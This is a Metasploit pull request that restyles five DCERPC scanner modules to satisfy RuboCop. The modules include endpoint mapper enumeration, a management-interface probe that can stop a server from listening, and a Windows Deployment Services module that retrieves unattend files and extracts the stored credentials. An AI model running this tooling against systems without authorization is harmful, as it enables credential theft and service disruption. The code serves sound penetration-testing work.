### PR TITLE
modules/auxiliary/scanner/dcerpc: Resolve RuboCop violations

### DIFF
--- a/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
+++ b/modules/auxiliary/scanner/dcerpc/dfscoerce.rb
@@ -30,7 +30,12 @@ class MetasploitModule < Msf::Auxiliary
       'References' => [
         [ 'URL', 'https://github.com/Wh04m1001/DFSCoerce' ]
       ],
-      'License' => MSF_LICENSE
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
 
     register_options(

--- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb
+++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb
@@ -3,6 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'English'
 class MetasploitModule < Msf::Auxiliary
 
   # Exploit mixins should be called first
@@ -15,66 +16,70 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'Endpoint Mapper Service Discovery',
+      'Name' => 'Endpoint Mapper Service Discovery',
       'Description' => %q{
         This module can be used to obtain information from the
         Endpoint Mapper service.
       },
-      'Author'      => 'hdm',
-      'License'     => MSF_LICENSE
+      'Author' => 'hdm',
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
 
     register_options(
       [
         Opt::RPORT(135)
-      ])
+      ]
+    )
   end
 
   # Obtain information about a single host
   def run_host(ip)
-    begin
+    ids = dcerpc_endpoint_list
+    return unless ids
 
-      ids = dcerpc_endpoint_list()
-      return if not ids
-      name = nil
-      ids.each do |id|
-        next if not id[:prot]
-        line = "#{id[:uuid]} v#{id[:vers]} "
-        line << "#{id[:prot].upcase} "
-        line << "(#{id[:port]}) " if id[:port]
-        line << "(#{id[:pipe]}) " if id[:pipe]
-        line << "#{id[:host]} " if id[:host]
-        line << "[#{id[:note]}]" if id[:note]
-        print_status(line)
-        if (id[:host] and id[:host][0,2] == "\\\\")
-          name = id[:host][2..-1]
-        end
-        if id[:prot].downcase == "tcp" or id[:prot].downcase == "udp"
-          report_service(
-            :host => ip,
-            :port => id[:port],
-            :proto => id[:prot].downcase,
-            :name => "dcerpc",
-            :info => "#{id[:uuid]} v#{id[:vers]} #{id[:note]}"
-          )
-        end
+    name = nil
+    ids.each do |id|
+      next if !id[:prot]
+
+      line = "#{id[:uuid]} v#{id[:vers]} "
+      line << "#{id[:prot].upcase} "
+      line << "(#{id[:port]}) " if id[:port]
+      line << "(#{id[:pipe]}) " if id[:pipe]
+      line << "#{id[:host]} " if id[:host]
+      line << "[#{id[:note]}]" if id[:note]
+      print_status(line)
+      if id[:host] && (id[:host][0, 2] == '\\\\')
+        name = id[:host][2..]
       end
-      report_host(:host => ip, :name => name) if name
+      next unless (id[:prot].downcase == 'tcp') || (id[:prot].downcase == 'udp')
+
       report_service(
-        :host => ip,
-        :port => rport,
-        :proto => 'tcp',
-        :name => "dcerpc",
-        :info => "Endpoint Mapper (#{ids.length} services)"
+        host: ip,
+        port: id[:port],
+        proto: id[:prot].downcase,
+        name: 'dcerpc',
+        info: "#{id[:uuid]} v#{id[:vers]} #{id[:note]}"
       )
-
-    rescue ::Interrupt
-      raise $!
-    rescue ::Rex::Proto::DCERPC::Exceptions::Fault
-    rescue ::Exception => e
-      print_error("#{ip}:#{rport} error: #{e}")
     end
+
+    report_host(host: ip, name: name) if name
+    report_service(
+      host: ip,
+      port: rport,
+      proto: 'tcp',
+      name: 'dcerpc',
+      info: "Endpoint Mapper (#{ids.length} services)"
+    )
+  rescue ::Interrupt
+    raise $ERROR_INFO
+  rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e
+    vprint_error("#{ip}:#{rport} error: #{e}")
+  rescue StandardError => e
+    print_error("#{ip}:#{rport} error: #{e}")
   end
-
-
 end

--- a/modules/auxiliary/scanner/dcerpc/hidden.rb
+++ b/modules/auxiliary/scanner/dcerpc/hidden.rb
@@ -25,7 +25,12 @@ class MetasploitModule < Msf::Auxiliary
       and analyzed to see whether anonymous access is permitted.
       },
       'Author' => 'hdm',
-      'License' => MSF_LICENSE
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
 
     deregister_options('RPORT')
@@ -76,17 +81,17 @@ class MetasploitModule < Msf::Auxiliary
           dcerpc.call(0, NDR.long(0) * 128)
           call = true
 
-          if (!dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?)
+          if !dcerpc.last_response.nil? && !dcerpc.last_response.stub_data.nil?
             data = dcerpc.last_response.stub_data
           end
         rescue ::Interrupt
           raise $ERROR_INFO
-        rescue ::Exception => e
+        rescue StandardError => e
           error = e.to_s
         end
 
         if error
-          if error =~ (/DCERPC FAULT/) && error !~ (/nca_s_fault_access_denied/)
+          if error =~ /DCERPC FAULT/ && error !~ /nca_s_fault_access_denied/
             call = true
           else
             elog(e)
@@ -103,20 +108,18 @@ class MetasploitModule < Msf::Auxiliary
         print_status(status)
         print_status('')
 
-        ## Add Report
         report_note(
           host: ip,
           proto: 'tcp',
           port: datastore['RPORT'],
           type: "DCERPC HIDDEN: UUID #{id[0]} v#{id[1]}",
-          data: { :status => status }
+          data: { status: status }
         )
       end
     end
   rescue ::Interrupt
     raise $ERROR_INFO
-  rescue ::Exception => e
+  rescue StandardError => e
     print_status("Error: #{e}")
   end
-
 end

--- a/modules/auxiliary/scanner/dcerpc/management.rb
+++ b/modules/auxiliary/scanner/dcerpc/management.rb
@@ -3,6 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'English'
 class MetasploitModule < Msf::Auxiliary
 
   # Exploit mixins should be called first
@@ -15,71 +16,72 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'Remote Management Interface Discovery',
+      'Name' => 'Remote Management Interface Discovery',
       'Description' => %q{
         This module can be used to obtain information from the Remote
         Management Interface DCERPC service.
       },
-      'Author'      => 'hdm',
-      'License'     => MSF_LICENSE
+      'Author' => 'hdm',
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
 
     register_options(
       [
         Opt::RPORT(135)
-      ])
+      ]
+    )
   end
 
   # Obtain information about a single host
   def run_host(ip)
-    begin
+    ids = dcerpc_mgmt_inq_if_ids(rport)
+    return unless ids
 
-      ids = dcerpc_mgmt_inq_if_ids(rport)
-      return if not ids
-      ids.each do |id|
-        print_status("UUID #{id[0]} v#{id[1]}")
+    ids.each do |id|
+      print_status("UUID #{id[0]} v#{id[1]}")
 
-        reportdata = ""
+      reportdata = ''
 
-        stats = dcerpc_mgmt_inq_if_stats(rport)
-        if stats
-          print_status("\t stats: " + stats.map{|i| "0x%.8x" % i}.join(", "))
-          reportdata << "stats: " + stats.map{|i| "0x%.8x" % i}.join(", ") + " "
-        end
-
-        live  = dcerpc_mgmt_is_server_listening(rport)
-        if live
-          print_status("\t listening: %.8x" % live)
-          #reportdata << "listening: %.8x" % live + " "
-        end
-
-        dead  = dcerpc_mgmt_stop_server_listening(rport)
-        if dead
-          print_status("\t killed: %.8x" % dead)
-          #reportdata << "killed: %.8x" % dead + " "
-        end
-
-        princ = dcerpc_mgmt_inq_princ_name(rport)
-        if princ
-          print_status("\t name: #{princ.unpack("H*")[0]}")
-          #reportdata << "name: #{princ.unpack("H*")[0]}"
-        end
-
-        # Add Report
-        report_note(
-          :host   => ip,
-          :proto  => 'tcp',
-          :port   => datastore['RPORT'],
-          :type   => "DCERPC UUID #{id[0]} v#{id[1]}",
-          :data   => { :report_data => reportdata }
-        )
-
+      stats = dcerpc_mgmt_inq_if_stats(rport)
+      if stats
+        print_status("\t stats: " + stats.map { |i| '0x%.8x' % i }.join(', '))
+        reportdata << 'stats: ' + stats.map { |i| '0x%.8x' % i }.join(', ') + ' '
       end
 
-    rescue ::Interrupt
-      raise $!
-    rescue ::Exception => e
-      print_error("Error: #{e}")
+      live = dcerpc_mgmt_is_server_listening(rport)
+      if live
+        print_status("\t listening: %.8x" % live)
+        # reportdata << "listening: %.8x" % live + " "
+      end
+
+      dead = dcerpc_mgmt_stop_server_listening(rport)
+      if dead
+        print_status("\t killed: %.8x" % dead)
+        # reportdata << "killed: %.8x" % dead + " "
+      end
+
+      princ = dcerpc_mgmt_inq_princ_name(rport)
+      if princ
+        print_status("\t name: #{princ.unpack('H*')[0]}")
+        # reportdata << "name: #{princ.unpack("H*")[0]}"
+      end
+
+      report_note(
+        host: ip,
+        proto: 'tcp',
+        port: datastore['RPORT'],
+        type: "DCERPC UUID #{id[0]} v#{id[1]}",
+        data: { report_data: reportdata }
+      )
     end
+  rescue ::Interrupt
+    raise $ERROR_INFO
+  rescue StandardError => e
+    print_error("Error: #{e}")
   end
 end

--- a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb
+++ b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb
@@ -3,61 +3,72 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
+require 'English'
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::DCERPC
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
-  DCERPCPacket   	= Rex::Proto::DCERPC::Packet
-  DCERPCClient   	= Rex::Proto::DCERPC::Client
-  DCERPCResponse 	= Rex::Proto::DCERPC::Response
-  DCERPCUUID     	= Rex::Proto::DCERPC::UUID
-  WDS_CONST 		  = Rex::Proto::DCERPC::WDSCP::Constants
+  DCERPCPacket	= Rex::Proto::DCERPC::Packet
+  DCERPCClient	= Rex::Proto::DCERPC::Client
+  DCERPCResponse	= Rex::Proto::DCERPC::Response
+  DCERPCUUID	= Rex::Proto::DCERPC::UUID
+  WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Microsoft Windows Deployment Services Unattend Retrieval',
-      'Description'    => %q{
-        This module retrieves the client unattend file from Windows
-        Deployment Services RPC service and parses out the stored credentials.
-        Tested against Windows 2008 R2 x64 and Windows 2003 x86.
-      },
-      'Author'         => [ 'Ben Campbell' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'URL', 'http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx'],
-          [ 'URL', 'http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html']
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Windows Deployment Services Unattend Retrieval',
+        'Description' => %q{
+          This module retrieves the client unattend file from Windows
+          Deployment Services RPC service and parses out the stored credentials.
+          Tested against Windows 2008 R2 x64 and Windows 2003 x86.
+        },
+        'Author' => [ 'Ben Campbell' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx'],
+          ['URL', 'http://rewtdance.blogspot.com/2012/11/windows-deployment-services-clear-text.html']
         ],
-      ))
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(5040),
-      ])
+      ]
+    )
 
     deregister_options('CHOST', 'CPORT', 'SSL', 'SSLVersion')
 
     register_advanced_options(
       [
         OptBool.new('ENUM_ARM', [true, 'Enumerate Unattend for ARM architectures (not currently supported by Windows and will cause an error in System Event Log)', false])
-      ])
+      ]
+    )
   end
 
   def run_host(ip)
+    query_host(ip)
+  rescue ::Interrupt
+    raise $ERROR_INFO
+  rescue ::Rex::ConnectionError => e
+    print_error("#{ip}:#{rport} Connection Error: #{e}")
+  ensure
+    # Ensure socket is pulled down afterwards
     begin
-      query_host(ip)
-    rescue ::Interrupt
-      raise $!
-    rescue ::Rex::ConnectionError => e
-      print_error("#{ip}:#{rport} Connection Error: #{e}")
-    ensure
-      # Ensure socket is pulled down afterwards
-      self.dcerpc.socket.close rescue nil
-      self.dcerpc = nil
-      self.handle = nil
+      dcerpc.socket.close
+    rescue StandardError
+      nil
     end
+    self.dcerpc = nil
+    self.handle = nil
   end
 
   def query_host(rhost)
@@ -75,15 +86,15 @@ class MetasploitModule < Msf::Auxiliary
 
     print_status("Binding to #{handle} ...")
 
-    self.dcerpc = Rex::Proto::DCERPC::Client.new(self.handle, self.sock)
+    self.dcerpc = Rex::Proto::DCERPC::Client.new(handle, sock)
     vprint_good("Bound to #{handle}")
 
     report_service(
-      :host => rhost,
-      :port => datastore['RPORT'],
-      :proto => 'tcp',
-      :name => "dcerpc",
-      :info => "#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services"
+      host: rhost,
+      port: datastore['RPORT'],
+      proto: 'tcp',
+      name: 'dcerpc',
+      info: "#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services"
     )
 
     table = Rex::Text::Table.new({
@@ -92,48 +103,54 @@ class MetasploitModule < Msf::Auxiliary
       'Columns' => ['Architecture', 'Type', 'Domain', 'Username', 'Password']
     })
 
-    creds_found = false
-
     WDS_CONST::ARCHITECTURE.each do |architecture|
       if architecture[0] == :ARM && !datastore['ENUM_ARM']
-        vprint_status "Skipping #{architecture[0]} architecture due to adv option"
+        vprint_status("Skipping #{architecture[0]} architecture as ENUM_ARM option is disabled")
         next
       end
 
       begin
-        result = request_client_unattend(architecture)
+        unattend_data = request_client_unattend(architecture)
       rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e
         vprint_error(e.to_s)
         print_error("#{rhost} DCERPC Fault - Windows Deployment Services is present but not configured. Perhaps an SCCM installation.")
-        return nil
+        next
       end
 
-      unless result.nil?
-        loot_unattend(architecture[0], result)
-        results = parse_client_unattend(result)
+      next if unattend_data.nil?
 
-        results.each do |result|
-          unless result.empty?
-            if result['username'] and result['password']
-              print_good("Retrieved #{result['type']} credentials for #{architecture[0]}")
-              creds_found = true
-              domain = ""
-              domain = result['domain'] if result['domain']
-              report_creds(domain, result['username'], result['password'])
-              table << [architecture[0], result['type'], domain, result['username'], result['password']]
-            end
-          end
-        end
+      loot_unattend(architecture[0], unattend_data)
+      results = parse_client_unattend(unattend_data)
+
+      results.each do |creds|
+        next if creds.empty?
+        next unless creds['username']
+        next unless creds['password']
+
+        print_good("Retrieved #{creds['type']} credentials for #{architecture[0]}")
+        report_creds(
+          creds['domain'] || '',
+          creds['username'],
+          creds['password']
+        )
+        table << [
+          architecture[0],
+          creds['type'],
+          creds['domain'] || '',
+          creds['username'],
+          creds['password']
+        ]
       end
     end
 
-    if creds_found
-      print_line
-      table.print
-      print_line
-    else
-      print_error("No Unattend files received, service is unlikely to be configured for completely unattended installation.")
+    if table.rows.empty?
+      print_error('No Unattend files received, service is unlikely to be configured for completely unattended installation.')
+      return
     end
+
+    print_line
+    table.print
+    print_line
   end
 
   def request_client_unattend(architecture)
@@ -141,74 +158,75 @@ class MetasploitModule < Msf::Auxiliary
     packet = Rex::Proto::DCERPC::WDSCP::Packet.new(:REQUEST, :GET_CLIENT_UNATTEND)
 
     guid = Rex::Text.rand_text_hex(32)
-    packet.add_var(	WDS_CONST::VAR_NAME_CLIENT_GUID, guid)
+    packet.add_var(WDS_CONST::VAR_NAME_CLIENT_GUID, guid)
 
     # Not sure what this padding is for...
     mac = [0x30].pack('C') * 20
     mac << Rex::Text.rand_text_hex(12)
-    packet.add_var(	WDS_CONST::VAR_NAME_CLIENT_MAC, mac)
+    packet.add_var(WDS_CONST::VAR_NAME_CLIENT_MAC, mac)
 
     arch = [architecture[1]].pack('C')
-    packet.add_var(	WDS_CONST::VAR_NAME_ARCHITECTURE, arch)
+    packet.add_var(WDS_CONST::VAR_NAME_ARCHITECTURE, arch)
 
     version = [1].pack('V')
-    packet.add_var(	WDS_CONST::VAR_NAME_VERSION, version)
+    packet.add_var(WDS_CONST::VAR_NAME_VERSION, version)
 
     wdsc_packet = packet.create
 
     vprint_status("Sending #{architecture[0]} Client Unattend request ...")
     dcerpc.call(0, wdsc_packet, false)
     timeout = datastore['DCERPC::ReadTimeout']
-    response = Rex::Proto::DCERPC::Client.read_response(self.dcerpc.socket, timeout)
+    response = Rex::Proto::DCERPC::Client.read_response(dcerpc.socket, timeout)
 
-    if (response and response.stub_data)
-      vprint_status('Received response ...')
-      data = response.stub_data
+    return unless response
+    return unless response.stub_data
 
-      # Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000
-      op_error_code = data.unpack('v*')[19]
-      if op_error_code == 0
-        if data.length < 277
-          vprint_error("No Unattend received for #{architecture[0]} architecture")
-          return nil
-        else
-          vprint_status("Received #{architecture[0]} unattend file ...")
-          return extract_unattend(data)
-        end
-      else
-        vprint_error("Error code received for #{architecture[0]}: #{op_error_code}")
-        return nil
-      end
+    vprint_status('Received response ...')
+    data = response.stub_data
+
+    # Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000
+    op_error_code = data.unpack('v*')[19]
+
+    if op_error_code != 0
+      vprint_error("Error code received for #{architecture[0]}: #{op_error_code}")
+      return
     end
+
+    if data.length < 277
+      vprint_error("No Unattend received for #{architecture[0]} architecture")
+      return
+    end
+
+    vprint_status("Received #{architecture[0]} unattend file ...")
+    extract_unattend(data)
   end
 
   def extract_unattend(data)
     start = data.index('<?xml')
     finish = data.index('</unattend>')
-    if start and finish
+    if start && finish
       finish += 10
       return data[start..finish]
     else
-      print_error("Incomplete transmission or malformed unattend file.")
+      print_error('Incomplete transmission or malformed unattend file.')
       return nil
     end
   end
 
   def parse_client_unattend(data)
-    begin
-      xml = REXML::Document.new(data)
-      return Rex::Parser::Unattend.parse(xml).flatten
-    rescue REXML::ParseException => e
-      print_error("Invalid XML format")
-      vprint_line(e.message)
-      return nil
-     end
+    xml = REXML::Document.new(data)
+    return Rex::Parser::Unattend.parse(xml).flatten
+  rescue REXML::ParseException => e
+    print_error('Invalid XML format')
+    vprint_line(e.message)
+    return nil
   end
 
-  def loot_unattend(archi, data)
+  def loot_unattend(architecture, data)
     return if data.empty?
-    p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, archi, "Windows Deployment Services")
-    print_good("Raw version of #{archi} saved as: #{p}")
+
+    p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, architecture, 'Windows Deployment Services')
+    print_good("Raw version of #{architecture} saved as: #{p}")
   end
 
   def report_cred(opts)


### PR DESCRIPTION
Most violations resolved with `rubocop -A`, except notes.

